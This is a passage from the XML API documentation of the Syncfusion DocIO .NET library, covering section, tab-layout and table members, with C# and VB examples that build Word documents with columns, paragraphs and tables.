            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.m_tabPosition">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.#ctor(System.Single,Syncfusion.Layouting.TabJustification,Syncfusion.Layouting.TabLeader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab"/> class.
            </summary>
            <param name="position">The position.</param>
            <param name="justification">The justification.</param>
            <param name="leader">The leader.</param>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.Justification">
            <summary>
            Gets or sets the justification.
            </summary>
            <value>The justification.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.TabLeader">
            <summary>
            Gets or sets the tab leader.
            </summary>
            <value>The tab leader.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.Position">
            <summary>
            Gets or sets the position.
            </summary>
            <value>The position.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ListTabs.#ctor(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraph.ListTabs"/> class.
            </summary>
            <param name="paragrath">The paragrath.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WSection">
            <summary>
            Represents the section of a Word document which contains header, footer, text body, etc. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWSection">
            <summary>
            Represents a section.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSection.AddColumn(System.Single,System.Single)">
            <summary>
            Adds a new <see cref="T:Syncfusion.DocIO.DLS.Column"/> to the section.
            </summary>
            <param name="width">The <b>float</b> that specifies the width of the column.</param>
            <param name="spacing">The <b>float</b> that specifies the spacing between the columns.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.Column"/> object.</returns>
            <example>The following example illustrates how to have multiple columns in a section.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                IWSection section = document.AddSection();
                //Add the column into the section
                section.AddColumn(150, 20);
                //Add the column into the section
                section.AddColumn(150, 20);
                //Add the column into the section
                section.AddColumn(150, 20);
                //Add a paragraph to created section
                IWParagraph paragraph = section.AddParagraph();
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                 paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As IWSection = document.AddSection()
                'Add the column into the section
                section.AddColumn(150, 20)
                'Add the column into the section
                section.AddColumn(150, 20)
                'Add the column into the section
                section.AddColumn(150, 20)
                'Add a paragraph to created section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSection.AddParagraph">
            <summary>
            Adds the <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> to the section body.
            </summary>
            <returns>The reference to the newly created paragraph.</returns>
            <example>The following example illustrates how to add a paragraph to the section.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Gets the first section in the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("First paragraph in section");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Gets the first section in the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("First paragraph in section")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSection.AddTable">
            <summary>
            Adds the <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to the section body.
            </summary>
            <returns>The reference to the newly created table.</returns>
            <example>The following example illustrates how to add a table to the section.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Gets the first section in the document
                IWSection section = document.AddSection();
                //Add new table to the section
                IWTable table = section.AddTable();
                //Set rows and columns count
                table.ResetCells(2, 2);
                //Add contents to the table
                IWParagraph paragraph = table[0, 0].AddParagraph();
                paragraph.AppendText("Apple");
                paragraph = table[0, 1].AddParagraph();
                paragraph.AppendText("Red");
                paragraph = table[1, 0].AddParagraph();
                paragraph.AppendText("Banana");
                paragraph = table[1, 1].AddParagraph();
                paragraph.AppendText("Yellow");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Gets the first section in the document
                Dim section As IWSection = document.AddSection()
                'Add new table to the section
                Dim table As IWTable = section.AddTable()
                'Set rows and columns count
                table.ResetCells(2, 2)
                'Add contents to the table
                Dim paragraph As IWParagraph = table(0, 0).AddParagraph()
                paragraph.AppendText("Apple")
                paragraph = table(0, 1).AddParagraph()
                paragraph.AppendText("Red")
                paragraph = table(1, 0).AddParagraph()
                paragraph.AppendText("Banana")
                paragraph = table(1, 1).AddParagraph()
                paragraph.AppendText("Yellow")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSection.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.WSection"/>, creates a duplicate copy.
            </summary>
            <returns>The cloned <see cref="T:Syncfusion.DocIO.DLS.WSection"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSection.MakeColumnsEqual">
            <summary>
            Makes all columns in the current section to be of equal width.
            </summary>
            <example>The following example illustrates how to have make the columns to be of equal width in a section.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument("Sample.docx");
                //Gets the first section in the document
                IWSection section = document.Sections[0];
                //Make the columns to be of equal width
                section.MakeColumnsEqual();
                //Save and close the document
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument("Sample.docx")
                'Gets the first section in the document
                Dim section As IWSection = document.Sections(0)
                'Make the columns to be of equal width
                section.MakeColumnsEqual()
                'Save and close the document
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.Paragraphs">
            <summary>
            Gets the paragraphs in the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphCollection"/> that represents the collection of 
            <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> in the section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.Tables">
            <summary>
            Gets the tables in the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/> that represents the collection of 
            <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> in the section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.Body">
            <summary>
            Gets the section body. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> of the current section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.PageSetup">
            <summary>
            Gets the page setup of the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WPageSetup"/> of the current section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.Columns">
            <summary>
            Gets the collection of columns which logically divide page on many printing or publishing areas. Read-only.
            </summary>
            <value>The collection of columns in the section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.BreakCode">
            <summary>
            Gets or sets section break code of the current section.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.SectionBreakCode"/> member that specifies the break code.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.ProtectForm">
            <summary>
            Gets or sets a value indicating whether to allow editing of form fields in the section.
            </summary>
            <value><b>True</b> if to allow editing of form fields; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSection.HeadersFooters">
            <summary>
            Gets headers and footers of the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WHeadersFooters"/> instance that specifies current section header, footer.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.DEF_DISTANCE_BETWEEN_COLUMNS">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_pageSetup">
            <summary>
            The section page Setup.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_columns">
            <summary>
            The columns collection.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_headersFooters">
            <summary>
            The headers / footers, related with current section.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_breakCode">
            <summary>
            The break code.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_internalData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_textDirection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_previousHeaderCount">
            <summary>
             PreviousHeaderCount for Alternate chunk
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_previousFooterCount">
            <summary>
             PreviousFooteCount for Alternate chunk
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WSection.m_bFlags">
            <summary>
            Gets the section body. Read-only.
            </summary>
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WSection"/> class 
            with the <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddColumn(System.Single,System.Single)">
            <summary>
            Adds a new <see cref="T:Syncfusion.DocIO.DLS.Column"/> to the section.
            </summary>
            <param name="width">The <b>float</b> that specifies the width of the column.</param>
            <param name="spacing">The <b>float</b> that specifies the spacing between the columns.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.Column"/> object.</returns>
            <example>The following example illustrates how to have multiple columns in a section.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                IWSection section = document.AddSection();
                //Add the column into the section
                section.AddColumn(150, 20);
                //Add the column into the section
                section.AddColumn(150, 20);
                //Add the column into the section
                section.AddColumn(150, 20);
                //Add a paragraph to created section
                IWParagraph paragraph = section.AddParagraph();
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                 paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As IWSection = document.AddSection()
                'Add the column into the section
                section.AddColumn(150, 20)
                'Add the column into the section
                section.AddColumn(150, 20)
                'Add the column into the section
                section.AddColumn(150, 20)
                'Add a paragraph to created section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddColumn(System.Single,System.Single,System.Boolean)">
            <summary>
            Adds a new <see cref="T:Syncfusion.DocIO.DLS.Column"/> to the section.
            </summary>
            <param name="width">The <b>float</b> that specifies the width of the column.</param>
            <param name="spacing">The <b>float</b> that specifies the spacing between the columns.</param>
            <param name="isOpening">The <b>bool</b> that specifies whether the document is opened.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.Column"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.MakeColumnsEqual">
            <summary>
            Makes all columns in the current section to be of equal width.
            </summary>
            <example>The following example illustrates how to have make the columns to be of equal width in a section.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument("Sample.docx");
                //Gets the first section in the document
                IWSection section = document.Sections[0];
                //Make the columns to be of equal width
                section.MakeColumnsEqual();
                //Save and close the document
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument("Sample.docx")
                'Gets the first section in the document
                Dim section As IWSection = document.Sections(0)
                'Make the columns to be of equal width
                section.MakeColumnsEqual()
                'Save and close the document
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.Clone">
            <summary>
            Creates a duplicate copy of the current section.
            </summary>
            <returns>The reference to the newly created section.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddParagraph">
            <summary>
            Adds the <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> to the section body.
            </summary>
            <returns>The reference to the newly created paragraph.</returns>
            <example>The following example illustrates how to add a paragraph to the section.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Gets the first section in the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("First paragraph in section");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Gets the first section in the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("First paragraph in section")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddTable">
            <summary>
            Adds the <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to the section body.
            </summary>
            <returns>The reference to the newly created table.</returns>
            <example>The following example illustrates how to add a table to the section.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Gets the first section in the document
                IWSection section = document.AddSection();
                //Add new table to the section
                IWTable table = section.AddTable();
                //Set rows and columns count
                table.ResetCells(2, 2);
                //Add contents to the table
                IWParagraph paragraph = table[0, 0].AddParagraph();
                paragraph.AppendText("Apple");
                paragraph = table[0, 1].AddParagraph();
                paragraph.AppendText("Red");
                paragraph = table[1, 0].AddParagraph();
                paragraph.AppendText("Banana");
                paragraph = table[1, 1].AddParagraph();
                paragraph.AppendText("Yellow");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Gets the first section in the document
                Dim section As IWSection = document.AddSection()
                'Add new table to the section
                Dim table As IWTable = section.AddTable()
                'Set rows and columns count
                table.ResetCells(2, 2)
                'Add contents to the table
                Dim paragraph As IWParagraph = table(0, 0).AddParagraph()
                paragraph.AppendText("Apple")
                paragraph = table(0, 1).AddParagraph()
                paragraph.AppendText("Red")
                paragraph = table(1, 0).AddParagraph()
                paragraph.AppendText("Banana")
                paragraph = table(1, 1).AddParagraph()
                paragraph.AppendText("Yellow")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddAlternateChunk">
            <summary>
            Adds the alternate chunk.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.GetText(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.AddEmptyParagraph">
            <summary>
            Add Empty paragraph to the section when the section doesn't have any items in the body collection or else it's last item is table in order to preserve section break
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.CloneWithoutBodyItems">
            <summary>
            Clones the without body items.
            Creates new section by cloning the page setup, column and header footers of the current section.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.CloneImpl">
            <summary>
            Creates a duplicate copy of the section.
            <exclude/>
            </summary>
            <returns>An object that can be casted as <see cref="T:Syncfusion.DocIO.DLS.WSection"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.HasTrackedChanges">
            <summary>
            Determines whether section has tracked changes.
            </summary>
            <returns>
            	if has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.Close">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>    
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes. 
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>      
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>       
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>       
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.CreateLayoutInfo">
            <summary>
            Create layout information.
            <exclude/>
            </summary>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSection.InitLayoutInfo(Syncfusion.DocIO.DLS.Entity,System.Boolean@)">
            <summary>
            
            </summary>
            <param name="entity"></param>
            <param name="isLastTOCEntry"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.PreviousHeaderCount">
            <summary>
            Gets or sets the PreviousHeaderCount for Alternate chunk
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.PreviousFooterCount">
            <summary>
            Gets or sets the PreviousFooteCount for Alternate chunk
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.Body">
            <summary>
            Gets the section body. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> of the current section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.HeadersFooters">
            <summary>
            Gets headers and footers of the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WHeadersFooters"/> instance that specifies current section header, footer.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.PageSetup">
            <summary>
            Gets the page setup of the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WPageSetup"/> of the current section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.Columns">
            <summary>
            Gets the collection of columns which logically divide page on many printing or publishing areas. Read-only.
            </summary>
            <value>The collection of columns in the section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.BreakCode">
            <summary>
            Gets or sets section break code of the current section.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.SectionBreakCode"/> member that specifies the break code.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.DataArray">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.ChildEntities">
            <summary>
            Gets the child elements of the section. Read-only.
            </summary>
            <value>The collection of child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.Paragraphs">
            <summary>
            Gets the paragraphs in the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphCollection"/> that represents the collection of 
            <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> in the section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.Tables">
            <summary>
            Gets the tables in the current section. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/> that represents the collection of 
            <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> in the section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.TextDirection">
            <summary>
            Gets or sets the text direction.
            </summary>
            <value>The text direction.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.ProtectForm">
            <summary>
            Gets or sets a value indicating whether to allow editing of form fields in the section.
            </summary>
            <value><b>True</b> if to allow editing of form fields; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.IsSectionFitInSamePage">
            <summary>
            Gets or sets a value indicating whether to the continuous section fit in same page or not.
            </summary>
            <value><b>True</b> if no need to create new page for continous section break; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.WidgetCollection">
            <summary>
            Returns the entity collection.
            <exclude/>
            </summary>
            <returns>The collection of entities in the text body.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSection.SectionChildEntities.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTable">
            <summary>
            Represents a table in the Word document. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWTable">
            <summary>
            Represents a table in a document. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.AddRow">
            <summary>
            Adds a new row to the table.
            </summary>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
            <example>The following example illustrates how to add new row to the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row to table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("$40");
                //Add second row to table
                row = table.AddRow(false);
                //Add the first cell into first row 
                cell = row.Cells[0];
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into first row 
                cell = row.Cells[1];
                cell.AddParagraph().AppendText("$30");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row to table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
